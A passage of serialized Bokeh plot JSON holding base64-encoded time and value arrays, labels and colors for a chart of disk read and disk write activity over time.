qUjV3QgAAEJlVNXdCAAD4B1k1d0IAAOB2XDV3QgAAyOVfNXdCAACwVGM1d0IAAJjDZjV3QgAAgDJqNXdCAABooW01d0IAAFAQcTV3QgAAOH90NXdCAAAg7nc1d0IAAAhdezV3QgAA8Mt+NXdCAADYOoI1d0IAAMCphTV3QgAAqBiJNXdCAACQh4w1d0IAAHj2jzV3QgAAYGWTNXdCAABI1JY1d0IAADBDmjV3QgAAGLKdNXdCAAAAIaE1d0IAAOiPpDV3QgAA0P6nNXdCAAC4bas1d0IAAKDcrjV3QgAAiEuyNXdCAABwurU1d0IAAFgpuTV3QgAAQJi8NXdCAAAoB8A1d0IAABB2wzV3QgAA+OTGNXdCAADgU8o1d0IAAMjCzTV3QgAAsDHRNXdCAACYoNQ1d0IAAIAP2DV3QgAAaH7bNXdCAABQ7d41d0IAADhc4jV3QgAAIMvlNXdCAAAIOuk1d0IAAPCo7DV3QgAA2BfwNXdCAADAhvM1d0IAAKj19jV3QgAAkGT6NXdCAAB40/01d0IAAGBCATZ3QgAASLEENndCAAAwIAg2d0IAABiPCzZ3QgAAAP4ONndCAADobBI2d0IAANDbFTZ3QgAAuEoZNndCAACguRw2d0IAAIgoIDZ3QgAAcJcjNndCAABYBic2d0IAAEB1KjZ3QgAAKOQtNndCAAAQUzE2d0IAAPjBNDZ3QgAA4DA4NndCAADInzs2d0IAALAOPzZ3QgAAmH1CNndCAACA7EU2d0IAAGhbSTZ3QgAAUMpMNndCAAA4OVA2d0IAACCoUzZ3QgAACBdXNndCAADwhVo2d0IAANj0XTZ3QgAAwGNhNndCAACo0mQ2d0IAAJBBaDZ3QgAAeLBrNndCAABgH282d0IAAEiOcjZ3QgAAMP11NndCAAAYbHk2d0IAAADbfDZ3QgAA6EmANndCAADQuIM2d0IAALgnhzZ3QgAAoJaKNndCAACIBY42d0IAAHB0kTZ3QgAAWOOUNndC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[240]},\"Type\":[\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\",\"Disk Read\"],\"color\":[\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"3087\"},\"selection_policy\":{\"id\":\"3088\"}},\"id\":\"3076\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"Data\",\"@Data\"],[\"Time\",\"@Time{%F %T}\"]]},\"id\":\"3041\",\"type\":\"HoverTool\"},{\"attributes\":{\"axis_label\":\"Data\",\"formatter\":{\"id\":\"3084\"},\"ticker\":{\"id\":\"3058\"}},\"id\":\"3057\",\"type\":\"LinearAxis\"},{\"attributes\":{\"data\":{\"Data\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzcxsCod24EEAAMAFfv+4QY/Ctbs/8LRB9ihc3R06kUEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABmZgaYsW7HQXE9ymTH3LRBFK7H/E5otUHXozB+Xhm5QdejcCxeZbJBAACANrO5sUEfhWtWgWSzQTMzc/Odj7NBj8J1BX94tEHhepTUBtq0Qc3MjJ2k7rRB7FH4+47OtkHNzMzvOJ+0QXE9CqQie7RBAACAMEAPtEHsUTg+uXq0QUjhOigsorNB7FF482/htEHXo3B0Fs69QcP1qJZlxcNBCtejYJtqiEEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9iicq1J7yUEzM7OkElC1QVyPQtCeFLRBMzPzQIy7tEGuRyGiRh+0QRSuhxRJbbRBhetR3IrRckEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[240]},\"Time\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[240]},\"Type\":[\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\",\"Disk Write\"],\"color\":[\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#